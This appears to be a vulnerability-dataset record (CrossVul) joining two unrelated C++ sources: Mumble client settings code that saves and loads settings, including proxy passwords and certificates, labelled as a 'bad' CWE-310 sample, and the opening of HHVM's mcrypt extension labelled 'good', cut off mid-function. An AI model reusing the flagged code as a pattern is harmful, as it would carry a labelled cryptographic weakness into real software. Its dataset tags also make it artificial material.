#ifdef Q_OS_WIN
// Don't enable minimize to tray by default on win7
bHideInTray = (QSysInfo::windowsVersion() != QSysInfo::WV_6_1);
#else
bHideInTray = true;
#endif
bStateInTray = true;
bUsage = true;
bShowUserCount = false;
wlWindowLayout = LayoutClassic;
bShowContextMenuInMenuBar = false;
ssFilter = ShowReachable;
iOutputDelay = 5;
qsALSAInput=QLatin1String("default");
qsALSAOutput=QLatin1String("default");
bEcho = false;
bEchoMulti = true;
bExclusiveInput = false;
bExclusiveOutput = false;
iPortAudioInput = -1; // default device
iPortAudioOutput = -1; // default device
bPositionalAudio = true;
bPositionalHeadphone = false;
fAudioMinDistance = 1.0f;
fAudioMaxDistance = 15.0f;
fAudioMaxDistVolume = 0.80f;
fAudioBloom = 0.5f;
iLCDUserViewMinColWidth = 50;
iLCDUserViewSplitterWidth = 2;
// PTT Button window
bShowPTTButtonWindow = false;
// Network settings
bTCPCompat = false;
bQoS = true;
bReconnect = true;
bAutoConnect = false;
ptProxyType = NoProxy;
usProxyPort = 0;
iMaxImageSize = ciDefaultMaxImageSize;
iMaxImageWidth = 1024; // Allow 1024x1024 resolution
iMaxImageHeight = 1024;
bSuppressIdentity = false;
// Accessibility
bHighContrast = false;
// Recording
qsRecordingPath = QDesktopServices::storageLocation(QDesktopServices::DocumentsLocation);
qsRecordingFile = QLatin1String("Mumble-%date-%time-%host-%user");
rmRecordingMode = RecordingMixdown;
iRecordingFormat = 0;
// Config updates
uiUpdateCounter = 0;
#if defined(AUDIO_TEST)
lmLoopMode = Server;
#else
lmLoopMode = None;
#endif
dPacketLoss = 0;
dMaxPacketDelay = 0.0f;
iMaxLogBlocks = 0;
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessages.insert(i, Settings::LogConsole | Settings::LogBalloon | Settings::LogTTS);
for (int i=Log::firstMsgType; i<=Log::lastMsgType; ++i)
qmMessageSounds.insert(i, QString());
qmMessageSounds[Log::CriticalError] = QLatin1String(":/Critical.ogg");
qmMessageSounds[Log::PermissionDenied] = QLatin1String(":/PermissionDenied.ogg");
qmMessageSounds[Log::SelfMute] = QLatin1String(":/SelfMutedDeafened.ogg");
qmMessageSounds[Log::ServerConnected] = QLatin1String(":/ServerConnected.ogg");
qmMessageSounds[Log::ServerDisconnected] = QLatin1String(":/ServerDisconnected.ogg");
qmMessageSounds[Log::TextMessage] = QLatin1String(":/TextMessage.ogg");
qmMessageSounds[Log::ChannelJoin] = QLatin1String(":/UserJoinedChannel.ogg");
qmMessageSounds[Log::ChannelLeave] = QLatin1String(":/UserLeftChannel.ogg");
qmMessageSounds[Log::YouMutedOther] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouMuted] = QLatin1String(":/UserMutedYouOrByYou.ogg");
qmMessageSounds[Log::YouKicked] = QLatin1String(":/UserKickedYouOrByYou.ogg");
qmMessageSounds[Log::Recording] = QLatin1String(":/RecordingStateChanged.ogg");
qmMessages[Log::DebugInfo] = Settings::LogConsole;
qmMessages[Log::Warning] = Settings::LogConsole | Settings::LogBalloon;
qmMessages[Log::Information] = Settings::LogConsole;
qmMessages[Log::UserJoin] = Settings::LogConsole;
qmMessages[Log::UserLeave] = Settings::LogConsole;
qmMessages[Log::UserKicked] = Settings::LogConsole;
qmMessages[Log::OtherSelfMute] = Settings::LogConsole;
qmMessages[Log::OtherMutedOther] = Settings::LogConsole;
}
bool Settings::doEcho() const {
if (! bEcho)
return false;
if (AudioInputRegistrar::qmNew) {
AudioInputRegistrar *air = AudioInputRegistrar::qmNew->value(qsAudioInput);
if (air) {
if (air->canEcho(qsAudioOutput))
return true;
}
}
return false;
}
bool Settings::doPositionalAudio() const {
return bPositionalAudio;
}
#include BOOST_TYPEOF_INCREMENT_REGISTRATION_GROUP()
BOOST_TYPEOF_REGISTER_TYPE(Qt::Alignment)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AudioTransmit)
BOOST_TYPEOF_REGISTER_TYPE(Settings::VADSource)
BOOST_TYPEOF_REGISTER_TYPE(Settings::LoopMode)
BOOST_TYPEOF_REGISTER_TYPE(Settings::OverlayShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ProxyType)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelExpand)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ChannelDrag)
BOOST_TYPEOF_REGISTER_TYPE(Settings::ServerShow)
BOOST_TYPEOF_REGISTER_TYPE(Settings::WindowLayout)
BOOST_TYPEOF_REGISTER_TYPE(Settings::AlwaysOnTopBehaviour)
BOOST_TYPEOF_REGISTER_TYPE(Settings::RecordingMode)
BOOST_TYPEOF_REGISTER_TYPE(QString)
BOOST_TYPEOF_REGISTER_TYPE(QByteArray)
BOOST_TYPEOF_REGISTER_TYPE(QColor)
BOOST_TYPEOF_REGISTER_TYPE(QVariant)
BOOST_TYPEOF_REGISTER_TYPE(QFont)
BOOST_TYPEOF_REGISTER_TEMPLATE(QList, 1)
#define SAVELOAD(var,name) var = qvariant_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var))
#define LOADENUM(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), var).toInt())
#define LOADFLAG(var, name) var = static_cast<BOOST_TYPEOF(var)>(settings_ptr->value(QLatin1String(name), static_cast<int>(var)).toInt())
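// on load, these macros read the named key into `var`, falling back to the member's current (default-constructed) value when the key is absent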
void OverlaySettings::load() {
load(g.qs);
}
void OverlaySettings::load(QSettings* settings_ptr) {
SAVELOAD(bEnable, "enable");
LOADENUM(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
LOADENUM(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginReadArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
LOADFLAG(qaUserName, "useralign");
LOADFLAG(qaChannel, "channelalign");
LOADFLAG(qaMutedDeafened, "mutedalign");
LOADFLAG(qaAvatar, "avataralign");
SAVELOAD(bUseWhitelist, "usewhitelist");
SAVELOAD(qslBlacklist, "blacklist");
SAVELOAD(qslWhitelist, "whitelist");
}
void Settings::load() {
load(g.qs);
}
void Settings::load(QSettings* settings_ptr) {
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
LOADENUM(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
LOADENUM(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(bSuppressIdentity, "net/suppress");
LOADENUM(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
LOADENUM(ceExpand, "ui/expand");
LOADENUM(ceChannelDrag, "ui/drag");
LOADENUM(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
LOADENUM(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
LOADENUM(ssFilter, "ui/serverfilter");
#ifndef NO_UPDATE_CHECK
SAVELOAD(bUpdateCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
#endif
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
LOADENUM(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = qvariant_cast<QByteArray> (settings_ptr->value(QLatin1String("net/certificate")));
if (! qba.isEmpty())
kpCertificate = CertWizard::importCert(qba);
int nshorts = settings_ptr->beginReadArray(QLatin1String("shortcuts"));
for (int i=0; i<nshorts; i++) {
settings_ptr->setArrayIndex(i);
Shortcut s;
s.iIndex = -2;
SAVELOAD(s.iIndex, "index");
SAVELOAD(s.qlButtons, "keys");
SAVELOAD(s.bSuppress, "suppress");
s.qvData = settings_ptr->value(QLatin1String("data"));
if (s.iIndex >= -1)
qlShortcuts << s;
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginReadArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmLCDDevices.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, settings_ptr->childKeys()) {
qmPositionalAudioPlugins.insert(d, settings_ptr->value(d, true).toBool());
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.load(settings_ptr);
settings_ptr->endGroup();
}
#undef SAVELOAD
#define SAVELOAD(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), var); else settings_ptr->remove(QLatin1String(name))
#define SAVEFLAG(var,name) if (var != def.var) settings_ptr->setValue(QLatin1String(name), static_cast<int>(var)); else settings_ptr->remove(QLatin1String(name))
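// on save, only values that differ from a default-constructed instance are written; keys whose value equals the default are removed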
void OverlaySettings::save() {
save(g.qs);
}
void OverlaySettings::save(QSettings* settings_ptr) {
OverlaySettings def;
SAVELOAD(bEnable, "enable");
SAVELOAD(osShow, "show");
SAVELOAD(bAlwaysSelf, "alwaysself");
SAVELOAD(uiActiveTime, "activetime");
SAVELOAD(osSort, "sort");
SAVELOAD(fX, "x");
SAVELOAD(fY, "y");
SAVELOAD(fZoom, "zoom");
SAVELOAD(uiColumns, "columns");
settings_ptr->beginWriteArray(QLatin1String("states"));
for (int i=0; i<4; ++i) {
settings_ptr->setArrayIndex(i);
SAVELOAD(qcUserName[i], "color");
SAVELOAD(fUser[i], "opacity");
}
settings_ptr->endArray();
SAVELOAD(qfUserName, "userfont");
SAVELOAD(qfChannel, "channelfont");
SAVELOAD(qcChannel, "channelcolor");
SAVELOAD(qfFps, "fpsfont");
SAVELOAD(qcFps, "fpscolor");
SAVELOAD(fBoxPad, "padding");
SAVELOAD(fBoxPenWidth, "penwidth");
SAVELOAD(qcBoxPen, "pencolor");
SAVELOAD(qcBoxFill, "fillcolor");
SAVELOAD(bUserName, "usershow");
SAVELOAD(bChannel, "channelshow");
SAVELOAD(bMutedDeafened, "mutedshow");
SAVELOAD(bAvatar, "avatarshow");
SAVELOAD(bBox, "boxshow");
SAVELOAD(bFps, "fpsshow");
SAVELOAD(fUserName, "useropacity");
SAVELOAD(fChannel, "channelopacity");
SAVELOAD(fMutedDeafened, "mutedopacity");
SAVELOAD(fAvatar, "avataropacity");
SAVELOAD(fFps, "fpsopacity");
SAVELOAD(qrfUserName, "userrect");
SAVELOAD(qrfChannel, "channelrect");
SAVELOAD(qrfMutedDeafened, "mutedrect");
SAVELOAD(qrfAvatar, "avatarrect");
SAVELOAD(qrfFps, "fpsrect");
SAVEFLAG(qaUserName, "useralign");
SAVEFLAG(qaChannel, "channelalign");
SAVEFLAG(qaMutedDeafened, "mutedalign");
SAVEFLAG(qaAvatar, "avataralign");
settings_ptr->setValue(QLatin1String("usewhitelist"), bUseWhitelist);
settings_ptr->setValue(QLatin1String("blacklist"), qslBlacklist);
settings_ptr->setValue(QLatin1String("whitelist"), qslWhitelist);
}
void Settings::save() {
QSettings* settings_ptr = g.qs;
Settings def;
// Config updates
SAVELOAD(uiUpdateCounter, "lastupdate");
SAVELOAD(bMute, "audio/mute");
SAVELOAD(bDeaf, "audio/deaf");
SAVELOAD(atTransmit, "audio/transmit");
SAVELOAD(uiDoublePush, "audio/doublepush");
SAVELOAD(bTxAudioCue, "audio/pushclick");
SAVELOAD(qsTxAudioCueOn, "audio/pushclickon");
SAVELOAD(qsTxAudioCueOff, "audio/pushclickoff");
SAVELOAD(iQuality, "audio/quality");
SAVELOAD(iMinLoudness, "audio/loudness");
SAVELOAD(fVolume, "audio/volume");
SAVELOAD(fOtherVolume, "audio/othervolume");
SAVELOAD(bAttenuateOthers, "audio/attenuateothers");
SAVELOAD(bAttenuateOthersOnTalk, "audio/attenuateothersontalk");
SAVELOAD(vsVAD, "audio/vadsource");
SAVELOAD(fVADmin, "audio/vadmin");
SAVELOAD(fVADmax, "audio/vadmax");
SAVELOAD(iNoiseSuppress, "audio/noisesupress");
SAVELOAD(iVoiceHold, "audio/voicehold");
SAVELOAD(iOutputDelay, "audio/outputdelay");
SAVELOAD(iIdleTime, "audio/idletime");
SAVELOAD(fAudioMinDistance, "audio/mindistance");
SAVELOAD(fAudioMaxDistance, "audio/maxdistance");
SAVELOAD(fAudioMaxDistVolume, "audio/maxdistancevolume");
SAVELOAD(fAudioBloom, "audio/bloom");
SAVELOAD(bEcho, "audio/echo");
SAVELOAD(bEchoMulti, "audio/echomulti");
SAVELOAD(bExclusiveInput, "audio/exclusiveinput");
SAVELOAD(bExclusiveOutput, "audio/exclusiveoutput");
SAVELOAD(bPositionalAudio, "audio/positional");
SAVELOAD(bPositionalHeadphone, "audio/headphone");
SAVELOAD(qsAudioInput, "audio/input");
SAVELOAD(qsAudioOutput, "audio/output");
SAVELOAD(bWhisperFriends, "audio/whisperfriends");
SAVELOAD(bTransmitPosition, "audio/postransmit");
SAVELOAD(iJitterBufferSize, "net/jitterbuffer");
SAVELOAD(iFramesPerPacket, "net/framesperpacket");
SAVELOAD(qsASIOclass, "asio/class");
SAVELOAD(qlASIOmic, "asio/mic");
SAVELOAD(qlASIOspeaker, "asio/speaker");
SAVELOAD(qsWASAPIInput, "wasapi/input");
SAVELOAD(qsWASAPIOutput, "wasapi/output");
SAVELOAD(qsALSAInput, "alsa/input");
SAVELOAD(qsALSAOutput, "alsa/output");
SAVELOAD(qsPulseAudioInput, "pulseaudio/input");
SAVELOAD(qsPulseAudioOutput, "pulseaudio/output");
SAVELOAD(qsOSSInput, "oss/input");
SAVELOAD(qsOSSOutput, "oss/output");
SAVELOAD(qsCoreAudioInput, "coreaudio/input");
SAVELOAD(qsCoreAudioOutput, "coreaudio/output");
SAVELOAD(iPortAudioInput, "portaudio/input");
SAVELOAD(iPortAudioOutput, "portaudio/output");
SAVELOAD(qbaDXInput, "directsound/input");
SAVELOAD(qbaDXOutput, "directsound/output");
SAVELOAD(bTTS, "tts/enable");
SAVELOAD(iTTSVolume, "tts/volume");
SAVELOAD(iTTSThreshold, "tts/threshold");
SAVELOAD(bTTSMessageReadBack, "tts/readback");
// Network settings
SAVELOAD(bTCPCompat, "net/tcponly");
SAVELOAD(bQoS, "net/qos");
SAVELOAD(bReconnect, "net/reconnect");
SAVELOAD(bAutoConnect, "net/autoconnect");
SAVELOAD(ptProxyType, "net/proxytype");
SAVELOAD(qsProxyHost, "net/proxyhost");
SAVELOAD(usProxyPort, "net/proxyport");
SAVELOAD(qsProxyUsername, "net/proxyusername");
SAVELOAD(qsProxyPassword, "net/proxypassword");
SAVELOAD(iMaxImageSize, "net/maximagesize");
SAVELOAD(iMaxImageWidth, "net/maximagewidth");
SAVELOAD(iMaxImageHeight, "net/maximageheight");
SAVELOAD(qsRegionalHost, "net/region");
SAVELOAD(bExpert, "ui/expert");
SAVELOAD(qsLanguage, "ui/language");
SAVELOAD(qsStyle, "ui/style");
SAVELOAD(qsSkin, "ui/skin");
SAVELOAD(ceExpand, "ui/expand");
SAVELOAD(ceChannelDrag, "ui/drag");
SAVELOAD(aotbAlwaysOnTop, "ui/alwaysontop");
SAVELOAD(bAskOnQuit, "ui/askonquit");
SAVELOAD(bMinimalView, "ui/minimalview");
SAVELOAD(bHideFrame, "ui/hideframe");
SAVELOAD(bUserTop, "ui/usertop");
SAVELOAD(qbaMainWindowGeometry, "ui/geometry");
SAVELOAD(qbaMainWindowState, "ui/state");
SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
SAVELOAD(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
SAVELOAD(ssFilter, "ui/serverfilter");
SAVELOAD(bUpdateCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
SAVELOAD(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = CertWizard::exportCert(kpCertificate);
settings_ptr->setValue(QLatin1String("net/certificate"), qba);
settings_ptr->beginWriteArray(QLatin1String("shortcuts"));
int idx = 0;
foreach(const Shortcut &s, qlShortcuts) {
if (! s.isServerSpecific()) {
settings_ptr->setArrayIndex(idx++);
settings_ptr->setValue(QLatin1String("index"), s.iIndex);
settings_ptr->setValue(QLatin1String("keys"), s.qlButtons);
settings_ptr->setValue(QLatin1String("suppress"), s.bSuppress);
settings_ptr->setValue(QLatin1String("data"), s.qvData);
}
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, qmLCDDevices.keys()) {
bool v = qmLCDDevices.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, qmPositionalAudioPlugins.keys()) {
bool v = qmPositionalAudioPlugins.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.save(settings_ptr);
settings_ptr->endGroup();
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/bad_3579_1 |
crossvul-cpp_data_good_2259_0 | /*
+----------------------------------------------------------------------+
| HipHop for PHP |
+----------------------------------------------------------------------+
| Copyright (c) 2010-2014 Facebook, Inc. (http://www.facebook.com) |
| Copyright (c) 1997-2010 The PHP Group |
+----------------------------------------------------------------------+
| This source file is subject to version 3.01 of the PHP license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.php.net/license/3_01.txt |
| If you did not receive a copy of the PHP license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@php.net so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
*/
#include "hphp/runtime/base/base-includes.h"
#include "hphp/runtime/base/runtime-error.h"
#include "hphp/runtime/ext/ext_math.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define NON_FREE
#define MCRYPT2
#include <mcrypt.h>
namespace HPHP {
///////////////////////////////////////////////////////////////////////////////
class MCrypt : public SweepableResourceData {
public:
explicit MCrypt(MCRYPT td) : m_td(td), m_init(false) {
}
~MCrypt() {
MCrypt::close();
}
void sweep() FOLLY_OVERRIDE {
close();
}
void close() {
if (m_td != MCRYPT_FAILED) {
mcrypt_generic_deinit(m_td);
mcrypt_module_close(m_td);
m_td = MCRYPT_FAILED;
}
}
CLASSNAME_IS("mcrypt");
// overriding ResourceData
virtual const String& o_getClassNameHook() const { return classnameof(); }
MCRYPT m_td;
bool m_init;
};
typedef enum {
RANDOM = 0,
URANDOM,
RAND
} iv_source;
class mcrypt_data {
public:
std::string algorithms_dir;
std::string modes_dir;
};
static mcrypt_data s_globals;
#define MCG(n) (s_globals.n)
#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif
#define MCRYPT_OPEN_MODULE_FAILED(str) \
raise_warning("%s(): Module initialization failed", str);
static Variant php_mcrypt_do_crypt(const String& cipher, const String& key,
const String& data, const String& mode,
const String& iv, bool dencrypt,
char *name) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED(name);
return false;
}
/* Checking for key-length */
int max_key_length = mcrypt_enc_get_key_size(td);
if (key.size() > max_key_length) {
raise_warning("Size of key is too large for this algorithm");
}
int count;
int *key_length_sizes = mcrypt_enc_get_supported_key_sizes(td, &count);
int use_key_length;
char *key_s = nullptr;
if (count == 0 && key_length_sizes == nullptr) { // no fixed key sizes reported: any length from 1 up to max_key_length is OK
use_key_length = key.size();
key_s = (char*)malloc(use_key_length);
memcpy(key_s, key.data(), use_key_length);
} else if (count == 1) { /* exactly one supported key size */
key_s = (char*)malloc(key_length_sizes[0]);
memset(key_s, 0, key_length_sizes[0]);
memcpy(key_s, key.data(), MIN(key.size(), key_length_sizes[0]));
use_key_length = key_length_sizes[0];
} else { /* determine the smallest supported key size >= the length of the requested key */
use_key_length = max_key_length; /* start with max key length */
for (int i = 0; i < count; i++) {
if (key_length_sizes[i] >= key.size() &&
key_length_sizes[i] < use_key_length) {
use_key_length = key_length_sizes[i];
}
}
key_s = (char*)malloc(use_key_length);
memset(key_s, 0, use_key_length);
memcpy(key_s, key.data(), MIN(key.size(), use_key_length));
}
mcrypt_free(key_length_sizes);
/* Check IV */
char *iv_s = nullptr;
int iv_size = mcrypt_enc_get_iv_size(td);
/* IV is required */
if (mcrypt_enc_mode_has_iv(td) == 1) {
if (!iv.empty()) {
if (iv_size != iv.size()) {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
} else {
iv_s = (char*)malloc(iv_size + 1);
memcpy(iv_s, iv.data(), iv_size);
}
} else {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
iv_s = (char*)malloc(iv_size + 1);
